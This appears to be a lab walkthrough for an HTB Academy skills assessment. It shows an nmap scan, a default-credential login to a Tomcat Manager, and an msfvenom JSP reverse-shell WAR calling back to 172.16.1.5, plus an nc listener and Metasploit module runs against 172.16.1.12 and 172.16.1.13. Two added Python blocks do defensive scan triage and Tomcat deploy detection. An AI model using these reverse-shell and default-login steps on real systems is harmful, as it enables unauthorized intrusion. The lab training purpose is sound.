# The Live Engagement

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FL3cnOoSuQhYCAliBsQlO%2Fimage.png?alt=media&#x26;token=d22921bd-d0b3-418a-afa2-a3e67ccda604" alt=""><figcaption></figcaption></figure>

First we have to log in to the IP that was given.

```
RDP to 10.129.86.5 with user "htb-student" and password "HTB_@cademy_stdnt!"
```

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FmxEeCtETAONLTHDPiAWE%2Fimage.png?alt=media&#x26;token=a44dab60-d390-4382-b098-cfddbe3ec2cc" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2Fl7rNkYsDing0oMibzdOF%2Fimage.png?alt=media&#x26;token=1854e88a-3803-4bef-aaa8-c92b0833570b" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FqCthZ6eFrDn31c2jO57n%2Fimage.png?alt=media&#x26;token=a8da5508-b0b3-48db-aa97-0de54320ad2e" alt=""><figcaption></figcaption></figure>

Then we run an nmap scan against the first host, 172.16.1.11.

```
# Nmap 7.92 scan initiated Tue Apr 30 02:56:03 2024 as: nmap -sC -sV -oN firsthost.nmap 172.16.1.11
Nmap scan report for status.inlanefreight.local (172.16.1.11)
Host is up (0.026s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Inlanefreight Server Status
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server 2019 Standard 17763 microsoft-ds
515/tcp  open  printer       Microsoft lpd
1801/tcp open  msmq?
2103/tcp open  msrpc         Microsoft Windows RPC
2105/tcp open  msrpc         Microsoft Windows RPC
2107/tcp open  msrpc         Microsoft Windows RPC
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=shells-winsvr
| Not valid before: 2024-04-29T06:08:54
|_Not valid after:  2024-10-29T06:08:54
|_ssl-date: 2024-04-30T06:57:03+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: SHELLS-WINSVR
|   NetBIOS_Domain_Name: SHELLS-WINSVR
|   NetBIOS_Computer_Name: SHELLS-WINSVR
|   DNS_Domain_Name: shells-winsvr
|   DNS_Computer_Name: shells-winsvr
|   Product_Version: 10.0.17763
|_  System_Time: 2024-04-30T06:56:57+00:00
8080/tcp open  http          Apache Tomcat 10.0.11
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/10.0.11
|_http-favicon: Apache Tomcat
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: shells-winsvr
|   NetBIOS computer name: SHELLS-WINSVR\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-04-29T23:56:57-07:00
| smb2-time: 
|   date: 2024-04-30T06:56:57
|_  start_date: N/A
|_clock-skew: mean: 1h23m59s, deviation: 3h07m49s, median: -1s
|_nbstat: NetBIOS name: SHELLS-WINSVR, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:17:44 (VMware)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr 30 02:57:03 2024 -- 1 IP address (1 host up) scanned in 59.90 seconds
```
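Before moving on to exploitation, here is how the scan above reads from the defensive side. This is an added example, not code from the original write-up: a small Python parser for nmap's normal output that pulls out each open port with its NSE script lines and flags the findings a defender would act on (TRACE enabled on IIS, SMB signing not required, a guest session answered, Tomcat and RDP exposed). The rules and the embedded scan excerpt are constructed for the demo, modelled on the report shown above.

```python
"""Triage an nmap -sC -sV normal-output report and flag what a defender should
act on. Added example, not part of the original write-up. SAMPLE_SCAN is a
constructed excerpt modelled on the 172.16.1.11 scan."""
import re

SAMPLE_SCAN = """\
Nmap scan report for status.inlanefreight.local (172.16.1.11)
Host is up (0.026s latency).
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Inlanefreight Server Status
| http-methods:
|_  Potentially risky methods: TRACE
445/tcp  open  microsoft-ds  Windows Server 2019 Standard 17763 microsoft-ds
3389/tcp open  ms-wbt-server Microsoft Terminal Services
8080/tcp open  http          Apache Tomcat 10.0.11
|_http-title: Apache Tomcat/10.0.11

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
"""

# One port line, e.g. "8080/tcp open  http          Apache Tomcat 10.0.11"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_scan(text):
    """Return (ports, host_scripts). Each port dict carries the NSE script
    lines printed under it; host_scripts holds the 'Host script results' block."""
    ports, host_scripts, current, in_host_block = [], [], None, False
    for line in text.splitlines():
        if line.startswith("Host script results:"):
            in_host_block = True
            continue
        m = PORT_RE.match(line)
        if m:
            current = {"port": int(m.group(1)), "proto": m.group(2),
                       "state": m.group(3), "service": m.group(4),
                       "version": m.group(5).strip(), "scripts": []}
            ports.append(current)
        elif line.startswith("|") and (in_host_block or current is not None):
            body = line.lstrip("|_ ").rstrip()      # strip nmap's tree prefix
            (host_scripts if in_host_block else current["scripts"]).append(body)
    return ports, host_scripts


def triage(ports, host_scripts):
    """Apply simple constructed rules to the parsed report; returns (port, message) pairs."""
    findings = []
    for p in ports:
        if p["state"] != "open":
            continue
        scripts = " ".join(p["scripts"])
        if "TRACE" in scripts:
            findings.append((p["port"], "HTTP TRACE enabled; disable the method"))
        if "Tomcat" in p["version"]:
            findings.append((p["port"], "Apache Tomcat exposed; confirm the Manager app "
                             "is unreachable from this network and has no default creds"))
        if p["service"] == "ms-wbt-server":
            findings.append((p["port"], "RDP exposed; restrict to admin networks and require NLA"))
    host = " ".join(host_scripts)
    if "not required" in host or "message_signing: disabled" in host:
        findings.append((445, "SMB signing not required; enforce it via policy"))
    if "account_used: guest" in host:
        findings.append((445, "SMB answered a guest session; disable guest access"))
    return findings


if __name__ == "__main__":
    parsed_ports, host_block = parse_scan(SAMPLE_SCAN)
    for port, message in triage(parsed_ports, host_block):
        print(f"{port:>5}  {message}")
```

Point `parse_scan` at a real `-oN` file instead of `SAMPLE_SCAN` to triage your own scans; the rule set in `triage` is deliberately small and is meant to be extended with whatever your environment considers a must-fix.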

Then we search for an exploit for the Tomcat web server.

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FzbwJqymEyHD6B8mJZSNr%2Fimage.png?alt=media&#x26;token=3a904901-33e0-4f84-8fc1-d100707f13b4" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2F7YTehj38uNDCHpL1uexq%2Fimage.png?alt=media&#x26;token=f65c90c1-5616-483f-826d-dc4d8d9b4aae" alt=""><figcaption></figcaption></figure>

But it failed.

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FG8NAofsrD8zs6fTMsYzn%2Fimage.png?alt=media&#x26;token=0b93a1ad-b9d3-4bff-986e-284dbebb0db1" alt=""><figcaption></figcaption></figure>

We tried both IPs, but it still failed.

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2F1TpQCRPIi7cVZ6kzTn85%2Fimage.png?alt=media&#x26;token=73f49897-1eab-46ad-abe3-8fd7b0227693" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FoFHfWvOsyXpb4ZdWpHOz%2Fimage.png?alt=media&#x26;token=86357838-51f4-4a67-b0d7-4b45f7ac73b4" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FkZa1BRaEadjuLXZQ0pr1%2Fimage.png?alt=media&#x26;token=433c35dc-f6b6-4243-9923-8093934c5334" alt=""><figcaption></figcaption></figure>

Then we are going to change the payload for the exploit.

```
msfvenom -l payloads | grep java
```

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FjAPyWkg8126KIfF6HoMG%2Fimage.png?alt=media&#x26;token=c41d2edb-b580-4f94-90b2-f795a91b6ecd" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```
msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.5 LPORT=9001 -f war -o shell.war
```

{% endcode %}

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FJGcOioAsQb0mwYoQUVI0%2Fimage.png?alt=media&#x26;token=3623a59f-222e-426b-ad8b-ba073b41810a" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FDdArNYnHQdoVf0FDyaum%2Fimage.png?alt=media&#x26;token=1ab2eba0-4a1c-4394-a661-811800b7e462" alt=""><figcaption></figcaption></figure>

Click the Manager App and log in with:

```
User - tomcat
Pass - Tomcatadm
```

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FGgdQ0Zl5xHjK0M1iICqi%2Fimage.png?alt=media&#x26;token=5d20c31b-a149-4cd6-8136-edc72f54c34c" alt=""><figcaption></figcaption></figure>

Upload a WAR file.

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FoKzGGBqEcFfVXj8fZfqX%2Fimage.png?alt=media&#x26;token=1e826e00-a055-4899-909f-7e288c67ffa7" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FeMsfpjbICdvlrr9ASSQW%2Fimage.png?alt=media&#x26;token=cf7cc265-a598-4b71-b464-67a5e3391904" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2F10h3gTU2Z5wXDAaNRaXy%2Fimage.png?alt=media&#x26;token=d06a264b-8b57-4ec9-aea2-5f60e0c4be35" alt=""><figcaption></figcaption></figure>

After several attempts to upload the WAR reverse shell, it succeeded.

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2F89Jh1TTkgv8dWHRSloS5%2Fimage.png?alt=media&#x26;token=9173cadb-c2a1-4ccd-91a4-3091cc7d9469" alt=""><figcaption></figcaption></figure>

Set up a listener and then access the shell.

```
nc -lnvp 9001
```

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FpEbDco6fmH6F0gBCrSSq%2Fimage.png?alt=media&#x26;token=c71b3854-1e9b-4cb6-9b7d-67d0dc56fc37" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FQJUdl2MGpfNcxnJBmGNd%2Fimage.png?alt=media&#x26;token=1485e9d0-0d60-4dd9-8937-00c18cc870c9" alt=""><figcaption></figcaption></figure>
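From a detection point of view, the WAR deployment through the Manager app above leaves a clear trail in Tomcat's access log. The following Python is an added example, not from the original write-up: it parses lines in Tomcat's default AccessLogValve "common" pattern, flags Manager use from hosts outside an assumed admin allow-list, flags successful deploys through `/manager/html/upload` or `/manager/text/deploy`, and correlates the first request to a never-before-seen context from the same client shortly afterwards. The log lines, the admin host 172.16.1.100 and the ten-minute correlation window are constructed assumptions for the demo.

```python
"""Detect web-application deployments through the Tomcat Manager app in access
logs. Added example, not from the original write-up. SAMPLE_LOG is constructed
in Tomcat's default "common" AccessLogValve pattern: %h %l %u %t "%r" %s %b."""
import re
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$')

# Manager endpoints that deploy a new web application (HTML upload form and text API).
DEPLOY_PATHS = ("/manager/html/upload", "/manager/text/deploy")

ADMIN_HOSTS = {"172.16.1.100"}   # assumption: hosts allowed to use the Manager app
CORRELATION_WINDOW = 600         # seconds between a deploy and the first hit on a new context

SAMPLE_LOG = """\
172.16.1.100 - tomcat [30/Apr/2024:06:40:02 +0000] "GET /manager/html HTTP/1.1" 200 18732
172.16.1.5 - - [30/Apr/2024:06:57:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
172.16.1.5 - tomcat [30/Apr/2024:06:57:20 +0000] "GET /manager/html HTTP/1.1" 200 18732
172.16.1.5 - tomcat [30/Apr/2024:06:58:11 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=8F2A HTTP/1.1" 200 19110
172.16.1.5 - - [30/Apr/2024:06:58:30 +0000] "GET /shell/ HTTP/1.1" 200 -
"""


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["path"] = rec["path"].split("?", 1)[0]   # drop the query string (CSRF nonce etc.)
    rec["status"] = int(rec["status"])
    return rec


def detect(lines):
    """Return (client_ip, message) alerts for Manager misuse and new-context access."""
    alerts = []
    deployed_by = {}     # client ip -> timestamp of its last successful deploy
    seen_paths = set()   # every path requested so far, to spot brand-new contexts
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path, status = rec["ip"], rec["path"], rec["status"]
        is_manager = path.startswith("/manager/")
        if is_manager and status == 200 and ip not in ADMIN_HOSTS:
            alerts.append((ip, f"Manager app used from non-admin host ({path})"))
        if path in DEPLOY_PATHS and status == 200:
            alerts.append((ip, f"web application deployed via {path} as user {rec['user']}"))
            deployed_by[ip] = rec["ts"]
        elif not is_manager and ip in deployed_by and path not in seen_paths:
            # First request from the deploying client to a context never seen before
            delta = (rec["ts"] - deployed_by[ip]).total_seconds()
            if 0 <= delta <= CORRELATION_WINDOW:
                alerts.append((ip, f"new context {path} requested {int(delta)}s after deploy"))
        seen_paths.add(path)
    return alerts


if __name__ == "__main__":
    for client, message in detect(SAMPLE_LOG.splitlines()):
        print(f"{client:<14} {message}")
```

The correlation step is what separates routine administration from the pattern on this page: a legitimate admin deploys from an allowed host and the new context is usually first visited by someone else, while here the same client deploys and immediately requests the new path. Feed `detect` the lines of `logs/localhost_access_log.*.txt` (the default AccessLogValve location under the Tomcat base directory) to run it over real data.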

* **Second host - 172.16.1.12 or blog.inlanefreight.local**

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FqAnvyeu6cBN8Zrqtc76B%2Fimage.png?alt=media&#x26;token=d7dbeae3-be89-438a-883e-4f75dc46133c" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FfFowzwWNv5zGBs4irTXo%2Fimage.png?alt=media&#x26;token=15323eeb-74c4-41b9-9613-f854618d9a14" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FLRC90aOXhL1o7pPvLj50%2Fimage.png?alt=media&#x26;token=8d9f67de-8bb0-4b9c-9011-d4d0b383d3b1" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FaWI7dFtYwsK5EV0qMpA9%2Fimage.png?alt=media&#x26;token=c6b8c4fa-98b5-4816-b41c-f3f287c3d797" alt=""><figcaption></figcaption></figure>

Use `reload_all` to refresh the modules in msfconsole.

```
reload_all
```

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FmqE5PwSq4ff8OL555MTh%2Fimage.png?alt=media&#x26;token=78307f25-7302-41d2-af71-c4ff0691f750" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FjrusW7l5vwxaGPw9M6V7%2Fimage.png?alt=media&#x26;token=cf8c52c9-081a-41e8-a457-341adb4f82c1" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FulRIpbHUQP1w7QS2bjPt%2Fimage.png?alt=media&#x26;token=86119d03-b391-4d23-9f48-2c6d6157242f" alt=""><figcaption></figcaption></figure>

```
run
shell
cat /customscripts/flag.txt
```

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FzzkZAOuTEkmG4hq6qUwo%2Fimage.png?alt=media&#x26;token=3e6af6a2-c552-427d-826e-c900d2163379" alt=""><figcaption></figcaption></figure>

* **Third host - 172.16.1.13**

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FfDpHjdGWPZW7lQ8u56fq%2Fimage.png?alt=media&#x26;token=327e17f7-f488-4adb-8a0e-19401595f82e" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FFYPzIWVcN0X4NK1LKbhU%2Fimage.png?alt=media&#x26;token=fff0e021-4ad9-4d07-a3d8-4e3945f590d1" alt=""><figcaption></figcaption></figure>

```
use 1
options
set rhost 172.16.1.13
set lhost 172.16.1.5
```

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FJN66Z4qKweDLQtQIKpy1%2Fimage.png?alt=media&#x26;token=1dc0f7de-338d-4491-a0f7-61df57133ee7" alt=""><figcaption></figcaption></figure>

```
run
```

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FE5KInrra34LhGyD9DbZB%2Fimage.png?alt=media&#x26;token=88ddc81b-284f-45d4-97ad-006297ea3fd6" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FiVtAShpVQsYhDxXzhfJO%2Fimage.png?alt=media&#x26;token=6e692416-eeb6-47a5-9f8f-0f2f8964a491" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3402520177-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6s691pQpzN41rNo5Bip4%2Fuploads%2FHZrKuEmimCGOD1Z48HpO%2Fimage.png?alt=media&#x26;token=4eb6fbf5-375d-4b99-ab87-56c13714910a" alt=""><figcaption></figcaption></figure>
